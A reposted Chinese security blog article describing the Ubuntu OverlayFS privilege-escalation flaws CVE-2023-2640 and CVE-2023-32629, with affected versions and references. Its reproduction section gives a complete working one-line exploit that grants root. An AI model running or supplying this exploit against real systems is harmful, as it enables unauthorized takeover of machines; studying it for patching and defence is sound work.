【漏洞复现】CVE-2023-2640 Ubuntu本地权限提升
2023-9-29 02:17:22 Author: mp.weixin.qq.com(查看原文) 阅读量:75 收藏

0x00 前言

Ubuntu是一种基于Linux操作系统的自由软件,它以用户友好的界面和易用性而著称。

0x01 漏洞描述

Ubuntu OverlayFS 模块中已发现两个权限提升漏洞,漏洞源于 Ubuntu 对容器环境中广泛使用的 OverlayFS 模块的实现差异。

(OverlayFS 是一种联合装载文件系统实现,因其允许通过用户名称空间进行无特权访问,并且受到容易被利用的漏洞的干扰,过去曾多次受到威胁攻击者的攻击)

CVE-2023-2640 涉及某些 Ubuntu 内核,这些内核允许非特权用户在未进行适当安全检查的情况下在已安装文件上设置特权扩展属性。 

第二个缺陷 CVE-2023-32629 是一个本地权限提升漏洞,在 Ubuntu 内核上执行某些操作时会跳过权限检查。 

从本质上讲,GameOver(lay) 漏洞能够制作具有作用域文件功能的可执行文件,欺骗 Ubuntu 内核将其复制到具有非作用域功能的不同位置。这授予任何执行它的人类似 root 的权限。 

0x02 CVE编号

CVE-2023-2640

CVE-2023-32629

0x03 影响版本

Ubuntu 23.04 (Lunar Lobster) Version 6.2.0Ubuntu 22.10 (Kinetic Kudu) Version 5.19.0Ubuntu 22.04 LTS (Jammy Jellyfish) Versions 5.19.0 and 6.2.0Ubuntu 20.04 LTS (Focal Fossa) Version 5.4.0 (Only affected by CVE-2023-32629)Ubuntu 18.04 LTS (Bionic Beaver) Version 5.4.0 (Only affected by CVE-2023-32629)Ubuntu 16.04 ESMUbuntu 14.04 ESM

0x04 漏洞复现

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'

0x05 参考链接

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32629

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2640

推荐阅读:

CVE-2023-41892|Craft CMS远程代码执行漏洞

【漏洞复现】CVE-2023-38831 WinRAR代码执行漏洞

CVE-2023-42442|JumpServer未授权访问漏洞

Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。文章中出现敏感信息和侵权内容,请联系作者删除信息。信息安全任重道远,感谢您的支持!!!


      本公众号的文章及工具仅提供学习参考,由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害,均由使用者本人负责,本公众号及文章作者不为此承担任何责任。


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2ODcxMjYzMA==&mid=2247484627&idx=1&sn=251a78ec1ad98d3e3b4400525a7b08bf&chksm=cea96d0af9dee41c2efb613c290852f60970daad2fdcf81cf228652ec7064561a791382a7edb&mpshare=1&scene=1&srcid=0926BW59NNxS1ExQNOaKiWVP&sharer_shareinfo=98bbdd54fdacf9adb4ea67ae9ea442f6&sharer_shareinfo_first=7abe9532da7a1af0f00620db78894487#rd
如有侵权请联系:admin#unsafe.sh